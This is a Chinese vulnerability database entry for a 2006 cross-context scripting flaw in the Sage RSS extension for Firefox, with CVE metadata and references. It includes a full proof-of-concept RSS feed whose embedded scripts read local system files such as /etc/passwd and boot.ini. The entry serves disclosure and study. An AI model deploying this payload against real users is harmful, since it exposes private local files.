Sage Extension for Firefox "img" 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110977 漏洞类型 未知
发布时间 2006-09-08 更新时间 2007-01-11
CVE编号 CVE-2006-6919 CNNVD-ID CNNVD-200701-140
漏洞平台 Multiple CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/28501
https://www.securityfocus.com/bid/87085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-140
|漏洞详情
FirefoxSageextension1.3.8及之前版本存在跨站脚本攻击漏洞,远程攻击者可以借助一个带有IMG标识的RSS输入端,在本地环境下运行任意的Javascript。该img标签包含被额外的拖拽的">"跟随的脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/19928/info

The application is prone to an input-validation vulnerability that allows malicious HTML and script code to be injected before it is used in dynamically generated content.

Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

.
	<rss version="2.0">
.
	<channel>
<title>Cross Context Scripting with Sage</title>
.
	<item>
<title>WINDOWS: works with "Allow HTML Tags" off</title>
.
	<content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/boot.ini"); request.send(); alert(request.responseText); } catch(e) {}</script>
</content:encoded>
</item>
.
	<item>
<title>WINDOWS: works with "Allow HTML Tags" on</title>
.
	<content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/boot.ini"); request.send(); alert(request.responseText); } catch(e) {}</script>
</content:encoded>
</item>
.
	<item>
<title>UNIX: works with "Allow HTML Tags" off</title>
.
	<content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/passwd"); request.send(); alert(request.responseText); } catch(e) {}</script>
</content:encoded>
</item>
.
	<item>
<title>UNIX: works with "Allow HTML Tags" on</title>
.
	<content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/passwd"); request.send(); alert(request.responseText); } catch(e) {}</script>
</content:encoded>
</item>
</channel>
</rss>
|参考资料

来源:VUPEN
名称:ADV-2006-4426
链接:http://www.frsirt.com/english/advisories/2006/4426
来源:SECUNIA
名称:22809
链接:http://secunia.com/advisories/22809
来源:XF
名称:sage-img-xss(30179)
链接:http://xforce.iss.net/xforce/xfdb/30179
来源:BUGTRAQ
名称:20061118Sagecross-contextscripting->LOCAL-CONTEXTSCRIPTING
链接:http://www.securityfocus.com/archive/1/archive/1/452010/100/0/threaded
来源:MISC
链接:http://michaeldaw.org/md-hacks/rss-injection-in-sage-part-2/